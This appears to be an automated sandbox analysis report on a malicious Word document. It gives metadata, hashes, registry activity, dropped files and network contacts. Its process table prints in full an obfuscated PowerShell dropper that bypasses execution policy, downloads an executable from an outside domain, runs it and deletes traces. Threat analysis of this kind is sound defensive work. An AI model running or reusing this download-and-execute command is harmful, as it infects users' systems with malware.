File name: | Guide 08.11.2018 901953098.doc |
Full analysis: | https://app.any.run/tasks/2fc83824-f522-4e1a-b3ff-1a8e56ff5662 |
Verdict: | Malicious activity |
Analysis date: | November 08, 2018, 08:48:23 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 5.1, Name of Creating Application: Microsoft Office Word, Author: Chlo M, Number of Characters: 6644, Create Time/Date: Mon Nov 5 15:21:11 2018, Last Saved Time/Date: Mon Nov 5 15:21:11 2018, Security: 0, Keywords: culpa, odit, veniam, Last Saved By: Chlo M, Revision Number: 739053, Subject: Guide N901953098, Template: Normal, Title: Guide N901953098, Total Editing Time: 01:00, Number of Words: 6644, Number of Pages: 55, Comments: Distinctio quod ullam enim ipsa pariatur assumenda asperiores. |
MD5: | B2B4B9AB087968193BEEB420B34FA145 |
SHA1: | E87F86CB488F0307611A084C0A30679AAEE82D23 |
SHA256: | 3622E1D25618DE39D51D54D4CD997A9597A31F7A3CFCD5CED8A778F7273035FC |
SSDEEP: | 3072:kSo4vCqXmSQZV7YJ9qmSzGt2uArD0LUhzikvQl4OSVfgvG3T05dfgEEN:zjcpZdYJxSit214M84/gvGuqN |
.doc | | | Microsoft Word document (33.9) |
---|
Category: | fugiat |
---|---|
Manager: | Jacqueline Balmat |
Company: | Comte |
Slides: | -2147483648 |
Notes: | -2147483648 |
Lines: | 517 |
HiddenSlides: | -2147483648 |
Bytes: | -2147483648 |
Paragraphs: | 174 |
Comments: | Distinctio quod ullam enim ipsa pariatur assumenda asperiores. |
Pages: | 55 |
Words: | 6644 |
TotalEditTime: | 1.0 minutes |
Title: | Guide N901953098 |
Template: | Normal |
Subject: | Guide N901953098 |
RevisionNumber: | 739053 |
LastModifiedBy: | Chloé Monnet |
Keywords: | culpa, odit, veniam |
Security: | None |
ModifyDate: | 2018:11:05 15:21:11 |
CreateDate: | 2018:11:05 15:21:11 |
Characters: | 6644 |
Author: | Chloé Monnet |
Software: | Microsoft Office Word |
CompObjUserType: | Microsoft Office Word 97-2003 Document |
CompObjUserTypeLen: | 39 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3672 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Guide 08.11.2018 901953098.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
1984 | C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exe $svddmoi='th=';$ieoooi14='qi';$avnrsro='cess; $pa';$ytxspwyu='rt-Proce';$syyoeo4='-force;';$mqreci='nfo/wp';$cgju65='e Pro';$ymkcydmi='ect S';$sgfaqz='gb.exe';$aofgogme51='press';$heyo='ove';$eieyzdi='Po';$hynf='t/t';$eyo='hemes/D';$lnaayyp='($env:tem';$eufz='DownloadF';$blyozr='ystem';$okjnxfb='l.e';$hqpeorl3='ile(''htt';$zqyb='ol'') ';$mghjhj='lic';$esv='t.W';$iclqh='New-Obj';$mkmi='y Bypa';$rcm=';Rem';$vjkcteo41=' -Scop';$axxeey=' + ''\is';$wxdba='2.hariom';$uuex='eb';$xaoue='emp';$yoo='ss $path';$adslsuy='.Ne';$ava='h); Sta';$gviei63='xe'',$pat';$ezwfne='-conten';$auya='-Item (f7f81a39-5f63-5b42-9efd-1f13b5431005#39;;$vwryiqjs='urse ';$jmxlgsy='Se';$youxai='ss';$awqziyi='p+''\tnail';$uyzt='web.i';$oigf='ps://word';$kycpat8='client).';$cmeerres='t-Executi';$owg=''');(';$nivui='-rec';$wlzo='ivi/po';$gcauay='on';$lhixui='env:t'; Invoke-Expression ($jmxlgsy+$cmeerres+$gcauay+$eieyzdi+$mghjhj+$mkmi+$youxai+$vjkcteo41+$cgju65+$avnrsro+$svddmoi+$lnaayyp+$awqziyi+$sgfaqz+$owg+$iclqh+$ymkcydmi+$blyozr+$adslsuy+$esv+$uuex+$kycpat8+$eufz+$hqpeorl3+$oigf+$aofgogme51+$wxdba+$uyzt+$mqreci+$ezwfne+$hynf+$eyo+$wlzo+$okjnxfb+$gviei63+$ava+$ytxspwyu+$yoo+$rcm+$heyo+$auya+$lhixui+$xaoue+$axxeey+$ieoooi14+$zqyb+$nivui+$vwryiqjs+$syyoeo4); | C:\Users\admin\AppData\Local\Temp\isqiol\usiju.exe | WINWORD.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | nx& |
Value: 6E782600580E0000010000000000000000000000 | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: Off | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages |
Operation: | write | Name: | 1033 |
Value: On | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | WORDFiles |
Value: 1298661393 | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1298661508 | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage |
Operation: | write | Name: | ProductFiles |
Value: 1298661509 | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word |
Operation: | write | Name: | MTTT |
Value: 580E0000AC5F6BD83F77D40100000000 | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | write | Name: | hy& |
Value: 68792600580E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems |
Operation: | delete value | Name: | hy& |
Value: 68792600580E000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000 | |||
(PID) Process: | (3672) WINWORD.EXE | Key: | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap |
Operation: | write | Name: | UNCAsIntranet |
Value: 0 |
PID | Process | Filename | Type | |
---|---|---|---|---|
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR30EE.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\Certificate.format.ps1xml | xml | |
MD5:C93A361112351B30E2C959E72789952D | SHA256:4379BD59C1328A6811584D424DF3DC193A5D607E2859D3AC1655B9124A5F100D | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:1178BF800A7E9A315A240C34A220AC74 | SHA256:D9C88E977D14F6A961A1118B14A375E85A2D6FC2467D14A13161D3D2EBF0E8B7 | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$ide 08.11.2018 901953098.doc | pgc | |
MD5:56B5B69C8E8944EA97F6859D63BA92E3 | SHA256:58F58ED5C67DEC52A1BEC85A9547B2CDB8150D5F1520295CA052A584B408E902 | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\DotNetTypes.format.ps1xml | xml | |
MD5:1AB2FD4B6749AD6831C86411FDCAFB48 | SHA256:98540086CFC986D7604FFDED977EF20944D1715BF8453809CE736C919CB6E1EF | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_aliases.help.txt | text | |
MD5:DCCDE3D3FA7A378DAB091D3B78E393CB | SHA256:5DD570CAA907247BAC82B722B453619ADC88063C238B294154939481C134B140 | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_Command_Syntax.help.txt | text | |
MD5:847B0C3A6010660492ECC1D88A69210D | SHA256:7D7EE4469AE76392317DC7E16E716B5767BD7EEFCDC39F60C51ED1DA2E99AE2B | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\en-US\about_debuggers.help.txt | text | |
MD5:DD41E5D943F66BC0CE48EEB0376A398E | SHA256:BE9F4B6BA21EFB0F13CB47A0F90FE8C23B36AE56C433ECB460F354144AB18B84 | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\CompiledComposition.Microsoft.PowerShell.GPowerShell.dll | executable | |
MD5:A84B6952AB6A297CCE6C085FA8AB06CB | SHA256:54E3F8199D5C749920A2826C63D7C5E7E86D94874ADDCFD5C9B430671031017D | |||
3672 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\isqiol\Diagnostics.Format.ps1xml | text | |
MD5:FF6EEB8125B9265C5BA40AF9F7C6F6BC | SHA256:7D569C1155CFA9B7BB2BA225EE409A55C8B0E8217F3A7E05BAA39DA1BD7C4689 |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
1984 | usiju.exe | 139.59.17.75:443 | wordpress2.hariomweb.info | Digital Ocean, Inc. | IN | unknown |
Domain | IP | Reputation |
---|---|---|
wordpress2.hariomweb.info |
| unknown |